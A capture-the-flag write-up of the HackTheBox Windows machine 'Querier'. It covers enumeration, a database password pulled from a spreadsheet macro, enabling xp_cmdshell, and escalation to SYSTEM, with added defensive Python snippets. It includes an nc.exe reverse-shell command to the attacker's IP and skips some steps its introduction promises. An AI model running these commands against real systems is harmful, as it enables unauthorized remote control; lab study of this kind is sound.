Querier is a medium difficulty Windows box which has an Excel spreadsheet in a world-readable file share. The spreadsheet has macros, which connect to MSSQL server running on the box. The SQL server can be used to request a file through which NetNTLMv2 hashes can be leaked and cracked to recover the plaintext password. After logging in, PowerUp can be used to find Administrator credentials in a locally cached group policy file.
Enumeration
Scope
IP Address: 10.10.10.125
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
1433/tcp open ms-sql-s syn-ack
5985/tcp open wsman syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ nmap -p135,139,445,1433,5985 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
|_ssl-date: 2024-07-11T13:38:17+00:00; +7s from scanner time.
| ms-sql-ntlm-info:
| 10.10.10.125:1433:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: QUERIER
| DNS_Domain_Name: HTB.LOCAL
| DNS_Computer_Name: QUERIER.HTB.LOCAL
| DNS_Tree_Name: HTB.LOCAL
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-07-11T13:34:28
|_Not valid after: 2054-07-11T13:34:28
| ms-sql-info:
| 10.10.10.125:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-07-11T13:38:13
|_ start_date: N/A
|_clock-skew: mean: 6s, deviation: 0s, median: 6s
* Open ports: 135,139,445,1433,5985
* Services: RPC - SMB - MSSQL - winRM
* Versions: Microsoft SQL Server 2017
* Important Notes: QUERIER.HTB.LOCAL
RPC Enumeration
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ rpcclient -U "%" $ip
rpcclient $> enumdomusers
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
SMB Enumeration
smbclient managed to get results but CME failed. The share Reports is not a standard share, so let's explore it.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ smbclient -N -L //$ip
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Reports Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.125 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB 10.10.10.125 445 QUERIER [+] HTB.LOCAL\:
SMB 10.10.10.125 445 QUERIER [-] Error enumerating shares: STATUS_ACCESS_DENIED
I mount the share on my Kali machine to explore it easily.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ sudo mount -t cifs "\\\\$ip\\Reports" ./mount
Password for root@\\10.10.10.125\Reports:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ ls mount
'Currency Volume Report.xlsm'
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ file mount/Currency\ Volume\ Report.xlsm
mount/Currency Volume Report.xlsm: Microsoft Excel 2007+
Initial Access
Shell as reporting
I searched online for this file extension and found that it is a macro-enabled Excel file that contains Visual Basic script.
I searched for a tool that can extract the script from an xlsm file and I found this one:
The macro script simply has a connection string to connect to the database and execute a SQL query.
Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open
So the credentials are reporting:PcwTWTHRwryjc$c6. Let's connect to the MSSQL database.
I want to execute system commands with xp_cmdshell, but I need to enable it first.
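A macro that ships a SQL login and password inside its connection string, as this one does, is exactly what a secret scan over extracted VBA source should catch. The following is an added example (not part of the original writeup, and not the extraction tool used above): it pulls `ConnectionString` assignments out of VBA text, splits them into ODBC key/value pairs and reports every string that carries a credential, without copying the secret into the finding. The VBA sample, server name and password are constructed placeholders.

```python
import re

# Constructed sample in the shape of the macro recovered from the spreadsheet;
# host and password are placeholders, not the values from the box.
VBA_SAMPLE = '''
Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=DBHOST;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=SamplePassw0rd"
conn.ConnectionTimeout = 10
conn.Open
Set conn2 = New ADODB.Connection
conn2.ConnectionString = "Driver={SQL Server};Server=DBHOST;Trusted_Connection=yes;Database=volume"
'''

# Matches `x.ConnectionString = "..."` assignments in VBA source.
CONN_STRING_RE = re.compile(r'ConnectionString\s*=\s*"([^"]*)"', re.IGNORECASE)
# ODBC keys that carry a plaintext secret.
SECRET_KEYS = {"pwd", "password"}

def parse_connection_string(cs: str) -> dict:
    """Split an ODBC connection string into lower-cased key -> value pairs."""
    pairs = {}
    for part in cs.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            pairs[key.strip().lower()] = value.strip()
    return pairs

def audit_vba_source(source: str) -> list:
    """Return one finding per connection string that embeds a credential.
    Only the key name of the secret is recorded, never its value, so the
    report itself does not become another copy of the password."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        m = CONN_STRING_RE.search(line)
        if not m:
            continue
        pairs = parse_connection_string(m.group(1))
        secret_keys = sorted(SECRET_KEYS & pairs.keys())
        if secret_keys:
            findings.append({
                "line": lineno,
                "server": pairs.get("server", "?"),
                "user": pairs.get("uid", pairs.get("user id", "?")),
                "secret_keys": secret_keys,
                # Integrated auth would remove the need for a stored password.
                "trusted_connection": pairs.get("trusted_connection", "").lower() == "yes",
            })
    return findings
```

The second connection string in the sample uses integrated authentication and produces no finding, which is the configuration a reviewer would ask the spreadsheet owner to move to.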
SQL (QUERIER\mssql-svc dbo@volume)> EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE; EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
The service account mssql-svc often has the SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege privileges, which can be used to escalate to the SYSTEM account.
SQL (QUERIER\mssql-svc dbo@volume)> xp_cmdshell "whoami /priv"
output
--------------------------------------------------------------------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
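For a hardening review of service accounts, the `whoami /priv` table above is worth parsing rather than eyeballing. The following is an added example (not part of the original writeup): it reads the table layout `whoami /priv` prints, maps each privilege to its state and returns the impersonation-related privileges the account holds. The sample output is constructed to mirror the listing above.

```python
# Constructed sample in the layout produced by `whoami /priv`.
WHOAMI_PRIV_SAMPLE = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges that let a compromised service account take on other security
# contexts; a review treats them as high-risk for any non-LocalSystem service.
HIGH_RISK = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

def parse_whoami_priv(output: str) -> dict:
    """Map privilege name -> 'Enabled'/'Disabled' from whoami /priv output.
    The name is the first token and the state the last, so the free-text
    description in between (which may contain spaces) can be skipped."""
    privs = {}
    for line in output.splitlines():
        parts = line.split()
        if (len(parts) >= 3 and parts[0].startswith("Se")
                and parts[-1] in ("Enabled", "Disabled")):
            privs[parts[0]] = parts[-1]
    return privs

def high_risk_privileges(output: str) -> dict:
    """Return the high-risk privileges held by the account, with their state.
    Disabled privileges are reported too: a privilege present in the token
    can be re-enabled by its holder, so holding it is the finding."""
    privs = parse_whoami_priv(output)
    return {name: state for name, state in privs.items() if name in HIGH_RISK}
```

Run against a real capture, an empty result means the service account has been stripped of both privileges, which is the state to aim for when the service does not need to impersonate callers.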
We can use the RoguePotato or PrintSpoofer tools together with nc.exe to carry out this attack.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.125] 49680
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
42be413e54f4658662xxxxxxxxxxxxxx
Root Flag: 42be413e54f4658662xxxxxxxxxxxxxx
Path 2
Get a shell to explore the system more easily for possible escalation paths.
SQL (QUERIER\mssql-svc dbo@volume)> xp_cmdshell "C:\Users\mssql-svc\nc.exe 10.10.16.3 443 -e PowerShell"
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.125] 49681
PS C:\Windows\system32>
Download PowerUp.ps1, which searches for misconfigurations and weaknesses on the system.